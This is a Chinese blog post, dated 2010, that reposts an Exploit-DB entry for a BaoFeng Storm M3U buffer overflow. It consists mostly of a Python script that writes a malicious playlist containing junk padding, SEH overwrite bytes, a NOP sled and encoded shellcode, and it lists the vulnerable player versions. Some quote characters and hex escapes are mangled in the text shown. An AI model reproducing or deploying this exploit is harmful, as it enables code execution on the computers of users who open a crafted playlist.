夜火博客

暴风影音的最新0DAY M3U缓冲区溢出漏洞利用工具exploit

暴风影音的最新0DAY M3U缓冲区溢出漏洞利用工具

Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit

EDB-ID: 12516

CVE-ID: ()

OSVDB-ID: ()

Author: Lufeng Li and Qingshan Li

Published: 2010-05-06

Verified: no

Download Exploit Code

Download N/A

view sourceprint?#!/usr/bin/env python

#################################################################

Title: BaoFeng Storm M3U File Processing Buffer Overflow Exploit

CNVD-ID: CNVD-2010-00752

Author: Lufeng Li and Qingshan Li of Neusoft Corporation

Download: www.baofeng.com

Test: Put m3u file in root(e.g. c:/ d:/),and open this m3u file

Platform: Windows XPSP3 Chinese Simplified

Vulnerable: Storm2012 3.10.4.21

Storm2012 3.10.4.16

Storm2012 3.10.4.8

Storm2012 3.10.3.17

Storm2012 3.10.2.5

Storm2012 3.10.1.12

#################################################################

Code :

file= “baofeng.m3u

junk =”x41″*795

nseh=”x61xe8xe1″

seh=”xaaxd7x40″

jmp =”x53x53x6dx58x6dx05x11x22x6dx2dx10x22x6dxacxe4″

nops =”x42″ * 110

shellcode=(“PPYAIAIAIAIAQATAXAZAPA3QADAZA”

“BARALAYAIAQAIAQAPA5AAAPAZ1AI1AIAIAJ11AIAIAXA”

“58AAPAZABABQI1AIQIAIQI1111AIAJQI1AYAZBABABAB”

“AB30APB944JBKLK8U9M0M0KPS0U99UNQ8RS44KPR004K”

“22LLDKR2MD4KCBMXLOGG0JO6NQKOP1WPVLOLQQCLM2NL”

“MPGQ8OLMM197K2ZP22B7TK0RLPTK12OLM1Z04KOPBX55″

“Y0D4OZKQXP0P4KOXMHTKR8MPKQJ3ISOL19TKNTTKM18V”

“NQKONQ90FLGQ8OLMKQY7NXK0T5L4M33MKHOKSMND45JB”

“R84K0XMTKQHSBFTKLL0KTK28MLM18S4KKT4KKQXPSYOT”

“NDMTQKQK311IQJPQKOYPQHQOPZTKLRZKSVQM2JKQTMSU”

“89KPKPKP0PQX014K2O4GKOHU7KIPMMNJLJQXEVDU7MEM”

“KOHUOLKVCLLJSPKKIPT5LEGKQ7N33BRO1ZKP23KOYERC”

“QQ2LRCM0LJA”)

fobj=open(file,”w”)

payload=junk+nseh+seh+jmp+nops+shellcode

fobj.write(payload)

fobj.close()

via neeao

本文标题:暴风影音的最新0DAY M3U缓冲区溢出漏洞利用工具exploit
文章作者:夜火
发布时间:2010-05-08